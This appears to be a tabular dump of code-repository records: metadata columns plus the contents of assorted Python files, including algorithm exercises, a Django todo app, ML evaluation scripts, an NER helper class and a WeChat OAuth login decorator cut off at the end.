blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 288 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 684 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 147 values | src_encoding stringclasses 25 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 128 12.7k | extension stringclasses 142 values | content stringlengths 128 8.19k | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1ac68e78d93c953c0944986d901463430077c9d2 | bcc4390952e8ddf257c1daa417bc06f1565e2346 | /source/ch01/sum2.py | 5109147e9a5e38a453c3b7a46c62401b2f56e02e | [
"MIT",
"GPL-3.0-only",
"GPL-1.0-or-later",
"LGPL-2.0-or-later"
] | permissive | AngelLiang/programming-in-python3-2nd-edition | 0ef80d4ba2cd096de1bb589dddf294c9d27c320c | 8f9a6ab6768a10e94daef641009288de6845245f | refs/heads/master | 2022-08-05T19:52:40.072130 | 2019-12-31T08:10:01 | 2019-12-31T08:10:01 | 230,700,866 | 1 | 0 | MIT | 2022-07-29T23:04:40 | 2019-12-29T04:09:05 | Python | UTF-8 | Python | false | false | 1,028 | py | #!/usr/bin/env python3
# Copyright (c) 2008-11 Qtrac Ltd. All rights reserved.
# This program or module is free software: you can redistribute it and/or
# modify it under the terms of the GNU General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version. It is provided for educational
# purposes and is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
# Read integers from stdin until EOF (^D / ^Z), then report count, total, mean.
print("Type integers, each followed by Enter; or ^D or ^Z to finish")
total = 0
count = 0
while True:
    try:
        line = input()
        if line:
            number = int(line)
            total += number
            count += 1
    except ValueError as err:
        # Non-integer input: report the parse error and keep reading.
        print(err)
        continue
    except EOFError:
        # End of the input stream terminates the loop.
        break
if count:
    print("count =", count, "total =", total, "mean =", total / count)
| [
"pl01665077@163.com"
] | pl01665077@163.com |
2efcc17f3e10fb0decca68df806443b7a7f44f08 | bd72c02af0bbd8e3fc0d0b131e3fb9a2aaa93e75 | /Stack/largest_rectangle_in_histogram.py | 95c663a2b334ed2257f15635bc5dd2630ed6f5a4 | [] | no_license | harvi7/Leetcode-Problems-Python | d3a5e8898aceb11abc4cae12e1da50061c1d352c | 73adc00f6853e821592c68f5dddf0a823cce5d87 | refs/heads/master | 2023-05-11T09:03:03.181590 | 2023-04-29T22:03:41 | 2023-04-29T22:03:41 | 222,657,838 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 605 | py | class Solution:
def largestRectangleArea(self, heights: List[int]) -> int:
if not heights or len(heights) == 0:return 0
hist_len = len(heights)
stack = []
maxArea = 0
i = 0
while i <= hist_len:
h = 0 if i == hist_len else heights[i]
if not stack or h >= heights[stack[-1]]:
stack.append(i)
else:
currMax = stack.pop()
maxArea = max(maxArea, heights[currMax] * (i if not stack else (i - 1 - stack[-1])))
i -= 1
i += 1
return maxArea | [
"iamharshvirani7@gmail.com"
] | iamharshvirani7@gmail.com |
98399b23e71e050447773e5b3aafe81bf176c63a | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03722/s716342934.py | e7c9f2de48ff64e451b266c19f1a41933248d364 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 793 | py | import sys
# Fast stdin reader (note: this intentionally shadows the builtin input()).
input=sys.stdin.readline
# n vertices, m directed edges.
n,m=map(int,input().split())
graph=[]
for _ in range(m):
    a,b,c=map(int,input().split())
    # Store 0-based endpoints with negated weight so that maximising the
    # total score becomes a shortest-path problem.
    graph.append([a-1,b-1,-c])
def BellmanFord(n, m, graph):
    """Bellman-Ford from vertex 0 over ``graph`` (list of [u, v, weight]).

    Returns the negated shortest distance to vertex ``n - 1``, or the
    string "inf" when that distance can still be improved by a reachable
    negative cycle (detected via extra relaxation rounds).
    ``m`` equals len(graph); it is kept for interface compatibility.
    """
    dist = [float("inf")] * n
    dist[0] = 0
    # Standard n-1 relaxation rounds.
    for _ in range(n - 1):
        for u, v, w in graph:
            relaxed = dist[u] + w
            if relaxed < dist[v]:
                dist[v] = relaxed
    # Keep relaxing a copy; if the target still improves, a negative
    # cycle influences the answer.
    probe = list(dist)
    for _ in range(n):
        for u, v, w in graph:
            relaxed = probe[u] + w
            if relaxed < probe[v]:
                probe[v] = relaxed
    if probe[n - 1] != dist[n - 1]:
        return "inf"
    return -dist[n - 1]
# Maximum achievable score for the path 0 -> n-1 ("inf" if unbounded).
print(BellmanFord(n,m,graph))
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
2428731975a9ea83206a64765f3ef4a9c41eb485 | 4472e40c53ca3e1df4f9e477a6268133309b7597 | /_unittests/ut_notebooks/test_LONG_2A_notebook_3B_correction.py | bdd5996c9425a33da74130e2fd6738e43642c400 | [
"MIT"
] | permissive | amoussoubaruch/ensae_teaching_cs | 289729742608da064f07a79b10cf6cce48de1b51 | 313a6ccb8756dbaa4c52724839b69af8a5f4476e | refs/heads/master | 2021-01-16T19:31:49.734583 | 2016-09-09T08:29:58 | 2016-09-09T08:29:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,859 | py | """
@brief test log(time=620s)
notebook test
"""
import sys
import os
import unittest
try:
import src
except ImportError:
path = os.path.normpath(
os.path.abspath(
os.path.join(
os.path.split(__file__)[0],
"..",
"..")))
if path not in sys.path:
sys.path.append(path)
import src
try:
import pyquickhelper as skip_
except ImportError:
path = os.path.normpath(
os.path.abspath(
os.path.join(
os.path.split(__file__)[0],
"..",
"..",
"..",
"pyquickhelper",
"src")))
if path not in sys.path:
sys.path.append(path)
import pyquickhelper as skip_
from pyquickhelper.loghelper import fLOG
from pyquickhelper.pycode import get_temp_folder, add_missing_development_version
class TestNotebookRunner2a_3B_correction (unittest.TestCase):
    """Long-running check that the td2a '_3B correction' notebooks execute."""
    def setUp(self):
        # Make development versions of helper packages importable before the test.
        add_missing_development_version(["pymyinstall", "pyensae", "pymmails"],
                                        __file__, hide=True)
    def test_notebook_runner_correction(self):
        # fLOG prints to stdout only when this file is run as a script.
        fLOG(
            __file__,
            self._testMethodName,
            OutputPrint=__name__ == "__main__")
        from src.ensae_teaching_cs.automation.notebook_test_helper import ls_notebooks, execute_notebooks, unittest_raise_exception_notebook, clean_function_1a
        temp = get_temp_folder(__file__, "temp_notebook2a_3B_correction")
        keepnote = ls_notebooks("td2a")
        assert len(keepnote) > 0
        # Execute only the '_3B correction' notebooks of the td2a series.
        res = execute_notebooks(
            temp, keepnote, lambda i, n: "_3B" in n and "correction" in n,
            clean_function=clean_function_1a)
        # Raises if any executed notebook reported an error.
        unittest_raise_exception_notebook(res, fLOG)
if __name__ == "__main__":
    unittest.main()
| [
"xavier.dupre@ensae.fr"
] | xavier.dupre@ensae.fr |
b248edbd3bfea1ed54561ee19f126b3ef7302301 | b08d42933ac06045905d7c005ca9c114ed3aecc0 | /src/coefSubset/evaluate/ranks/twentyPercent/rank_1e96_D.py | 9dc7a74058ecda9aad5e9d179b6bcbbf0bea7a90 | [] | no_license | TanemuraKiyoto/PPI-native-detection-via-LR | d148d53f5eb60a4dda5318b371a3048e3f662725 | 897e7188b0da94e87126a4acc0c9a6ff44a64574 | refs/heads/master | 2022-12-05T11:59:01.014309 | 2020-08-10T00:41:17 | 2020-08-10T00:41:17 | 225,272,083 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,392 | py | # 9 July 2019
# Kiyoto Aramis Tanemura
# Several metrics are used to assess the performance of the trained RF model, notably native ranking. This script returns a ranking of the native protein-protein complex among a decoy set. For convenience, I will define as a function and will call in a general performance assessment script.
# Modified 11 July 2019 by Kiyoto Aramis Tanemura. To parallelize the process, I will replace the for loop for the testFileList to a multiprocessing pool.
# Modified 9 September 2019 by Kiyoto Aramis Tanemura. I will use the function to perform the calculation on one CSV file only. Thus instead of a function to import in other scripts, they will be individual jobs parallelized as individual jobs in the queue.
import os
import pandas as pd
import numpy as np
import pickle
os.chdir('/mnt/scratch/tanemur1/')
# Read the model and trainFile
testFile = '1e96.csv'
identifier = 'D'
coefFrac = 0.2
testFilePath = '/mnt/scratch/tanemur1/CASF-PPI/nonb_descriptors/complete/'
modelPath = '/mnt/home/tanemur1/6May2019/2019-11-11/results/coefSubset/twentyPercent/'
outputPath = '/mnt/home/tanemur1/6May2019/2019-11-11/results/coefSubset/evaluate/twentyPercent/ranks/'
pdbID = testFile[:4]
with open(modelPath + 'model' + identifier + '.pkl', 'rb') as f:
clf = pickle.load(f)
result = pd.DataFrame()
scoreList = []
df1 = pd.read_csv(testFilePath + testFile)
dropList = ['Unnamed: 0', 'Unnamed: 0.1', 'ref']
df1 = df1.drop(dropList, axis = 1)
df1 = df1.set_index('Pair_name')
df1 = pd.DataFrame(df1.values.T, columns = df1.index, index = df1.columns)
df1.fillna(0.0, inplace = True)
#df1 = df1.reindex(sorted(df1.columns), axis = 1)
# Keep coefficients within the given fraction when ordered by decreasing order of coefficient magnitude
coefs = pd.read_csv('/mnt/home/tanemur1/6May2019/2019-11-11/results/medianCoefs.csv', index_col = 0, header = None, names = ['coefficients'])
coefs['absVal'] = np.abs(coefs['coefficients'])
coefs.sort_values(by = 'absVal', ascending = False, inplace = True)
coefs = coefs[:int(14028 * coefFrac + 0.5)]
keepList = list(coefs.index)
del coefs
df1 = df1[keepList]
df1 = df1.reindex(sorted(df1.columns), axis = 1)
with open(modelPath + 'standardScaler' + identifier + '.pkl', 'rb') as g:
scaler = pickle.load(g)
for i in range(len(df1)):
# subtract from one row each row of the dataframe, then remove the trivial row[[i]] - row[[i]]. Also some input files have 'class' column. This is erroneous and is removed.
df2 = pd.DataFrame(df1.iloc[[i]].values - df1.values, index = df1.index, columns = df1.columns)
df2 = df2.drop(df1.iloc[[i]].index[0], axis = 0)
# Standardize inut DF using the standard scaler used for training data.
df2 = scaler.transform(df2)
# Predict class of each comparison descriptor and sum the classes to obtain score. Higher score corresponds to more native-like complex
predictions = clf.predict(df2)
score = sum(predictions)
scoreList.append(score)
# Make a new DataFrame to store the score and corresponding descriptorID. Add rank as column. Note: lower rank corresponds to more native-like complex
result = pd.DataFrame(data = {'score': scoreList}, index = df1.index.tolist()).sort_values(by = 'score', ascending = False)
result['rank'] = range(1, len(result) + 1)
with open(outputPath + pdbID + identifier + '.csv', 'w') as h:
result.to_csv(h)
| [
"tanemur1@msu.edu"
] | tanemur1@msu.edu |
661f8b888e79a6f44694634cfd74115ed4dae3e8 | 3821860187e15a4235d541e7db510732c18212b0 | /tasks/views.py | fab3922931a2e2c9190ef6eba0db6b38369398da | [] | no_license | memadd/todo | 15fb5901a87b162bb793c0b9f4c73674e38bab8f | 3ed0acc15596964c50eca863b01fdddff7f5586d | refs/heads/master | 2021-04-02T18:33:27.582092 | 2020-03-31T22:18:29 | 2020-03-31T22:18:29 | 248,308,247 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,086 | py | from django.shortcuts import render, redirect
from django.http import HttpResponse
from .models import *
from .forms import *
# Create your views here.
def index(request):
    """Render the task list; on POST, create a new task from the form."""
    form = TaskForm()
    if request.method == 'POST':
        form = TaskForm(request.POST)
        if form.is_valid():
            form.save()
            return redirect('/')
    # On GET (or invalid POST) fall through and render the list page;
    # an invalid bound form carries its validation errors into the template.
    tasks = Task.objects.all()
    return render(request, 'tasks/list.html', {'tasks': tasks, 'form': form})
def update_task(request, pk):
    """Edit the task identified by ``pk``; on valid POST, save and go home."""
    task = Task.objects.get(id=pk)
    if request.method == 'POST':
        form = TaskForm(request.POST, instance=task)
        if form.is_valid():
            form.save()
            return redirect('/')
    else:
        form = TaskForm(instance=task)
    # Invalid POST re-renders the bound form with its errors.
    return render(request, 'tasks/update_task.html', {'form': form})
def delete_task(request, pk):
    """Show a confirmation page on GET; delete the task and redirect on POST."""
    item = Task.objects.get(id=pk)
    if request.method == 'POST':
        item.delete()
        return redirect('/')
    return render(request, 'tasks/delete.html', {'item': item})
"memad632@gmail.com"
] | memad632@gmail.com |
f9169b2aac3ad5c32eb0cb07c38f5fe71fefbb5f | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_205/ch84_2020_04_07_23_54_12_724713.py | 4c822726ed79558cc3825e318a52fc3229b76091 | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 174 | py | def inverte_dicionario (dic):
inverte = {}
for chave in dic.keys():
for valores in dic.values():
inverte[valores]=dic[valores]
return inverte | [
"you@example.com"
] | you@example.com |
def fac(c1, c2):
    """Return the falling product c1 * (c1 - 1) * ... * (c2 + 1), i.e. c1!/c2!.

    Returns 1 when c1 <= c2 (empty product).
    """
    product = 1
    term = c1
    while term > c2:
        product *= term
        term -= 1
    return product
# Number of test cases.
t=int(input())
ab=[]
for m in range(t):
    ab.append(list(map(int,input().split())))
for j in ab:
    # n = j[0]! / j[1]!  (falling factorial product).
    n=fac(j[0],j[1])
    c=0
    # Count prime factors of n with multiplicity by trial division.
    # NOTE(review): n becomes a float after n = n / x, so large inputs can
    # lose precision; integer division (n //= x) would stay exact — confirm.
    while n>1:
        x=2
        while x<n+1:
            if n%x==0:
                n=n/x
                c+=1
                break
            x+=1
    print(c)
| [
"noreply@github.com"
] | Shamabanu.noreply@github.com |
540ddc515614afa96a6c6e81efdcad3a4d539484 | 4feaf520374804d6f3feebe3700fb448692a44ba | /pullenti/ner/org/internal/OrgItemNumberToken.py | 9a6de49d739833dc981c94e92e6055a792890f6b | [] | no_license | MihaJjDa/APCLtask | f7be3fb6b0f31801196bf779f6a7e62ce245493b | 4745b45e199887d433ab256bb2e2ebf5dbe3f7cd | refs/heads/master | 2020-04-16T17:15:10.846647 | 2020-02-24T16:06:43 | 2020-02-24T16:06:43 | 165,769,146 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,200 | py | # Copyright (c) 2013, Pullenti. All rights reserved. Non-Commercial Freeware.
# This class is generated using the converter UniSharping (www.unisharping.ru) from Pullenti C#.NET project (www.pullenti.ru).
# See www.pullenti.ru/downloadpage.aspx.
from pullenti.unisharp.Utils import Utils
from pullenti.ner.Token import Token
from pullenti.ner.MetaToken import MetaToken
from pullenti.ner.NumberToken import NumberToken
from pullenti.ner.TextToken import TextToken
from pullenti.ner.core.NumberHelper import NumberHelper
from pullenti.ner.core.MiscHelper import MiscHelper
class OrgItemNumberToken(MetaToken):
    """Meta token for an organisation number (e.g. military-unit or colony numbers)."""
    def __init__(self, begin : 'Token', end : 'Token') -> None:
        super().__init__(begin, end, None)
        # Parsed number as a string (may carry '-' or letter suffixes); None if unknown.
        self.number = None;
    def __str__(self) -> str:
        return "№ {0}".format(Utils.ifNotNull(self.number, "?"))
    @staticmethod
    def tryAttach(t : 'Token', can_be_pure_number : bool=False, typ : 'OrgItemTypeToken'=None) -> 'OrgItemNumberToken':
        """Try to parse an organisation number starting at token ``t``.

        Returns an OrgItemNumberToken or None. ``typ`` (an already recognised
        organisation type) widens what is accepted: for military units /
        colonies, pure digit runs with optional suffixes are allowed.
        """
        if (t is None):
            return None
        tt = Utils.asObjectOrNull(t, TextToken)
        if (tt is not None):
            # Explicit number prefix (e.g. "№" / "N") followed by digits.
            t1 = MiscHelper.checkNumberPrefix(tt)
            if ((isinstance(t1, NumberToken)) and not t1.is_newline_before):
                return OrgItemNumberToken._new1704(tt, t1, str((t1).value))
        # Hyphen glued directly to a number ("-123"), unless it parses as an age.
        if ((t.is_hiphen and (isinstance(t.next0_, NumberToken)) and not t.is_whitespace_before) and not t.is_whitespace_after):
            if (NumberHelper.tryParseAge(t.next0_) is None):
                return OrgItemNumberToken._new1704(t, t.next0_, str((t.next0_).value))
        if (isinstance(t, NumberToken)):
            # Number glued after a hyphen ("...-123").
            if ((not t.is_whitespace_before and t.previous is not None and t.previous.is_hiphen)):
                return OrgItemNumberToken._new1704(t, t, str((t).value))
            # Bare numbers are accepted for military units and penal colonies
            # (Russian/Ukrainian type names checked by substring).
            if (typ is not None and typ.typ is not None and (((typ.typ == "войсковая часть" or typ.typ == "військова частина" or "колония" in typ.typ) or "колонія" in typ.typ))):
                # NOTE(review): "length_char >= 4 or length_char <= 6" is always
                # True; the comment-style intent looks like 4 <= length <= 6
                # ("and" instead of "or") — confirm against upstream pullenti.
                if (t.length_char >= 4 or t.length_char <= 6):
                    res = OrgItemNumberToken._new1704(t, t, str((t).value))
                    # Optional "-N" / "/N" numeric suffix or single-letter suffix.
                    if (t.next0_ is not None and ((t.next0_.is_hiphen or t.next0_.isCharOf("\\/"))) and not t.next0_.is_whitespace_after):
                        if ((isinstance(t.next0_.next0_, NumberToken)) and ((t.length_char + t.next0_.next0_.length_char) < 9)):
                            res.end_token = t.next0_.next0_
                            res.number = "{0}-{1}".format(res.number, (res.end_token).value)
                        elif ((isinstance(t.next0_.next0_, TextToken)) and t.next0_.next0_.length_char == 1 and t.next0_.next0_.chars.is_letter):
                            res.end_token = t.next0_.next0_
                            res.number = "{0}{1}".format(res.number, (res.end_token).term)
                    elif ((isinstance(t.next0_, TextToken)) and t.next0_.length_char == 1 and t.next0_.chars.is_letter):
                        res.end_token = t.next0_
                        res.number = "{0}{1}".format(res.number, (res.end_token).term)
                    return res
        # Single letter glued to a (possibly hyphen-separated) number, again
        # only for military units / colonies: e.g. "В-123" -> "В123".
        if (((isinstance(t, TextToken)) and t.length_char == 1 and t.chars.is_letter) and not t.is_whitespace_after):
            if (typ is not None and typ.typ is not None and (((typ.typ == "войсковая часть" or typ.typ == "військова частина" or "колония" in typ.typ) or "колонія" in typ.typ))):
                tt1 = t.next0_
                if (tt1 is not None and tt1.is_hiphen):
                    tt1 = tt1.next0_
                if ((isinstance(tt1, NumberToken)) and not tt1.is_whitespace_before):
                    res = OrgItemNumberToken(t, tt1)
                    res.number = "{0}{1}".format((t).term, (tt1).value)
                    return res
        return None
    @staticmethod
    def _new1704(_arg1 : 'Token', _arg2 : 'Token', _arg3 : str) -> 'OrgItemNumberToken':
        """Generated helper: construct a token spanning _arg1.._arg2 with number _arg3."""
        res = OrgItemNumberToken(_arg1, _arg2)
        res.number = _arg3
        return res
"danila.puchkin@mail.ru"
] | danila.puchkin@mail.ru |
9fe80f0e87dfc1126fed1e23de9636b732dc37f6 | 2090b6b92d5cada89504de548b14f9c729856606 | /visualize/gmt/helpers/generate_gmt_station_list.py | a08d5762939b547fbd2afd76dd6ba239210ef41b | [] | no_license | ziyixiArchive/Japan_Slab_code | 4f6a366889278ad499971cf1132591b9029c0f8c | 4cb19939e45739faee7a8b6ec3d3a5da4549a108 | refs/heads/master | 2022-03-14T18:11:47.768695 | 2019-12-17T21:48:32 | 2019-12-17T21:48:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,098 | py | import numpy as np
import click
CEA_NETWORKS = ["AH", "BJ", "BU", "CQ", "FJ", "GD", "GS", "GX", "GZ", "HA", "HB", "HE", "HI", "HL", "HN",
"JL", "JS", "JX", "LN", "NM", "NX", "QH", "SC", "SD", "SH", "SN", "SX", "TJ", "XJ", "XZ", "YN", "ZJ"]
@click.command()
@click.option('--stations_file', required=True, type=str)
@click.option('--output_file', required=True, type=str)
def main(stations_file, output_file):
stations = np.loadtxt(stations_file, dtype=np.str)
with open(output_file, "w") as f:
for row in stations:
net = row[1]
if(net in CEA_NETWORKS):
net = 0
elif(net == "BO"):
net = 1
elif(net == "KG"):
net = 2
elif(net == "XL"):
net = 3
elif(net == "8B"):
net = 4
elif(net == "YP"):
net = 5
elif(net == "X4"):
net = 6
else:
net = 7
f.write(f"{row[3]} {row[2]} {net}\n")
# Run the CLI entry point when executed as a script.
if __name__ == "__main__":
    main()
| [
"xiziyi@msu.edu"
] | xiziyi@msu.edu |
a212d11a29b6161c29d2539135a62e3803d7c7ca | 3f09e77f169780968eb4bd5dc24b6927ed87dfa2 | /src/Problems/Binary_Tree_Maximum_Path_Sum.py | cf6ee11ab89c3fc0ae2de014dbe7b1d837f3788f | [] | no_license | zouyuanrenren/Leetcode | ad921836256c31e31cf079cf8e671a8f865c0660 | 188b104b81e6c73792f7c803c0fa025f9413a484 | refs/heads/master | 2020-12-24T16:59:12.464615 | 2015-01-19T21:59:15 | 2015-01-19T21:59:15 | 26,719,111 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,726 | py | '''
Created on 21 Nov 2014
@author: zouyuanrenren
'''
'''
Given a binary tree, find the maximum path sum.
The path may start and end at any node in the tree.
For example:
Given the below binary tree,
1
/ \
2 3
Return 6.
'''
'''
The idea is simple:
1. for each node, there are 4 paths that include the node:
a. node itself
b. node + left sub-path with max sum
c. node + right sub-path with max sum
d. node + left sub-path with max sum + right sub-path with max sum
we only need to compute the largest out of the above 4 for each node
2. for each node, the sub-path with max sum that ends with the node can be:
a. node itself
b. node + left sub-path with max sum
c. node + right sub-path with max sum
we only need to compute the largest out of the above 3 for each node, so that it can be used by its parent node
3. hence we do with depth-first search and recursion
'''
# Definition for a binary tree node
class TreeNode:
    """Plain binary-tree node holding a value and two child links."""
    def __init__(self, x):
        self.val = x
        self.left = None
        self.right = None

class Solution:
    # @param root, a tree node
    # @return an integer
    def maxPathSum(self, root):
        """Return the maximum path sum over all paths in the tree (0 if empty)."""
        if root is None:
            return 0
        best = [None]
        self.maxsum(root, best)
        return best[0]

    def maxsum(self, root, maxlist):
        """Post-order helper: records in ``maxlist[0]`` the best path seen and
        returns the best downward path sum ending at ``root``."""
        if root is None:
            return 0
        left_gain = self.maxsum(root.left, maxlist)
        right_gain = self.maxsum(root.right, maxlist)
        # Best path that ends at this node (may extend into one subtree).
        ending_here = max(root.val, root.val + left_gain, root.val + right_gain)
        # A path through this node may additionally join both subtrees.
        through = max(ending_here, root.val + left_gain + right_gain)
        if maxlist[0] is None or through > maxlist[0]:
            maxlist[0] = through
        return ending_here
| [
"y.ren@abdn.ac.uk"
] | y.ren@abdn.ac.uk |
55865bd610510d6adfb96a2195797860ebd21aa2 | a46fc5187245f7ac79758ae475d4d865e24f482b | /211_add_and_search_word/add_word.py | 10752d7d4f827bc56950070c27b991981c6095a3 | [] | no_license | narnat/leetcode | ae31f9321ac9a087244dddd64706780ea57ded91 | 20a48021be5e5348d681e910c843e734df98b596 | refs/heads/master | 2022-12-08T00:58:12.547227 | 2020-08-26T21:04:53 | 2020-08-26T21:04:53 | 257,167,879 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,417 | py | #!/usr/bin/env python
class Node:
    """Trie node: 26 child slots for 'a'..'z' plus an end-of-word flag."""
    def __init__(self):
        self.children = [None] * 26
        self.is_end = False

class WordDictionary:
    """Trie-backed word store supporting '.' wildcards in search()."""
    def __init__(self):
        self.root = Node()

    def addWord(self, word: str) -> None:
        """Insert ``word`` (lowercase letters only) into the trie."""
        node = self.root
        for ch in word:
            slot = ord(ch) - ord('a')
            if node.children[slot] is None:
                node.children[slot] = Node()
            node = node.children[slot]
        node.is_end = True

    def search(self, word: str) -> bool:
        """Return True if ``word`` matches a stored word; '.' matches any letter."""
        return self.search_rec(word, 0, self.root)

    def search_rec(self, word, n, node):
        """Match word[n:] against the subtrie rooted at ``node``."""
        if node is None:
            return False
        if n == len(word):
            return node.is_end
        ch = word[n]
        if ch == '.':
            # Wildcard: try every existing child branch.
            return any(self.search_rec(word, n + 1, child) for child in node.children)
        return self.search_rec(word, n + 1, node.children[ord(ch) - ord('a')])
| [
"farruh1996@gmail.com"
] | farruh1996@gmail.com |
87d22d165b6db77ed6dce9c200bbaaa6eb4f752f | 6b85910d57ad533b887a462082084dcef8e42bd8 | /cifar10_brn_mode_2.py | 004cf3feedfaebbd57caf7ffea8a3b1a5f0d4db3 | [] | no_license | ml-lab/BatchRenormalization | 49137cb7457f27807524500bee422c085a2fb4e8 | fdd1cd2c0da0f6105ad29852969630abeb4890c7 | refs/heads/master | 2020-05-29T21:03:29.698663 | 2017-02-20T22:31:21 | 2017-02-20T22:31:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,437 | py | import numpy as np
import json
import keras.callbacks as callbacks
from keras.datasets import cifar10
import keras.utils.np_utils as kutils
from keras import backend as K
from wrn_renorm import WideResidualNetwork
batch_size = 128
nb_epoch = 100
img_rows, img_cols = 32, 32
# Load CIFAR-10 and scale pixel values into [0, 1].
(trainX, trainY), (testX, testY) = cifar10.load_data()
trainX = trainX.astype('float32')
trainX /= 255.0
testX = testX.astype('float32')
testX /= 255.0
# One-hot encode the 10 class labels.
trainY = kutils.to_categorical(trainY)
testY = kutils.to_categorical(testY)
# Channels-first vs channels-last input shape depending on the Keras backend.
init_shape = (3, 32, 32) if K.image_dim_ordering() == 'th' else (32, 32, 3)
# WRN-16-4 with batch renormalization (mode 2); weights come from disk below.
model = WideResidualNetwork(depth=16, width=4, weights=None, classes=10, mode=2) # mode 2
model.compile(loss="categorical_crossentropy", optimizer="adam", metrics=["accuracy"])
model.load_weights('weights/Batch renorm Weights Mode 2.h5')
# Training is disabled; the commented block below was used to produce the
# checkpoint and history files loaded/reported by this evaluation run.
# history = model.fit(trainX, trainY, batch_size, nb_epoch=nb_epoch,
#                     callbacks=[
#                         callbacks.ModelCheckpoint("weights/Batch renorm Weights Mode 2.h5", monitor="val_acc", save_best_only=True,
#                                                   save_weights_only=True)],
#                     validation_data=(testX, testY))
#
# with open('history/batch_renorm_mode_2_history.txt', 'w') as f:
#     json.dump(history.history, f)
scores = model.evaluate(testX, testY, batch_size)
print("Test loss : %0.5f" % (scores[0]))
print("Test accuracy = %0.5f" % (scores[1]))
| [
"titu1994@gmail.com"
] | titu1994@gmail.com |
ba8acff9e53924815b665296b189e9c5a48a1694 | cb99ba5b850e5667166c9a7b318ab09f28a50da3 | /wxchat/decorators.py | f43b23f05028c480d7b5ff78d40110cb97151d10 | [] | no_license | malx927/kele | 3831714eb6335e6fb2b05d463e4c7875aa87de2b | 542b412e9e9859b03d47d289a9069b9262289897 | refs/heads/master | 2022-12-02T13:29:57.174259 | 2021-07-11T13:26:00 | 2021-07-11T13:26:00 | 130,623,335 | 0 | 1 | null | 2022-11-22T02:28:55 | 2018-04-23T01:21:14 | HTML | UTF-8 | Python | false | false | 2,631 | py | #-*-coding:utf-8-*-
import json
from django.http import HttpResponseRedirect, HttpResponse
from django.shortcuts import get_object_or_404
from wxchat.models import WxUserinfo
__author__ = 'malxin'
from django.conf import settings
from wechatpy.oauth import WeChatOAuth
def weixin_decorator(func):
    """View decorator implementing the WeChat OAuth2 (snsapi_userinfo) login flow.

    Ensures an ``openid`` is present in the session: when missing, redirects
    through WeChat authorization; on the callback, exchanges the ``code`` for
    the user's profile, upserts it into WxUserinfo and caches identity fields
    in the session before calling the wrapped view.
    """
    def wrapper(request, *args, **kwargs):
        code = request.GET.get('code', None)
        openid = request.session.get('openid', None)
        # NOTE(review): debug print — leaks auth codes/openids to stdout/logs.
        print('weixin_decorator', code, openid)
        if openid is None:
            if code is None: # first pass: send the user to WeChat to obtain an authorization code
                redirect_url = '%s://%s%s' % (request.scheme, request.get_host(), request.get_full_path())
                print('redirect_url=', redirect_url)
                webchatOAuth = WeChatOAuth(settings.WECHAT_APPID, settings.WECHAT_SECRET, redirect_url, 'snsapi_userinfo')
                authorize_url = webchatOAuth.authorize_url
                return HttpResponseRedirect(authorize_url)
            else: # authorization granted: exchange the code for an access token, then pull the user info
                webchatOAuth = WeChatOAuth(settings.WECHAT_APPID, settings.WECHAT_SECRET, '', 'snsapi_userinfo')
                res = webchatOAuth.fetch_access_token(code)
                if 'errcode' in res:
                    # Token exchange failed: surface the raw WeChat error payload.
                    return HttpResponse(json.dumps(res))
                else:
                    open_id = webchatOAuth.open_id
                    userinfo = webchatOAuth.get_user_info()
                    userinfo.pop('privilege')
                    # Create or refresh the stored WeChat profile for this openid.
                    obj, created = WxUserinfo.objects.update_or_create(openid=open_id, defaults=userinfo)
                    request.session['openid'] = open_id
                    userinf = get_object_or_404(WxUserinfo, openid=open_id)
                    request.session['nickname'] = userinf.nickname
                    request.session['is_member'] = userinf.is_member
                    request.session['headimgurl'] = userinf.headimgurl
                    request.session['role'] = userinf.member_role.id if userinf.member_role else 0
                    return func(request, *args, **kwargs)
        else:
            # Already authenticated: refresh the cached session fields.
            request.session['openid'] = openid
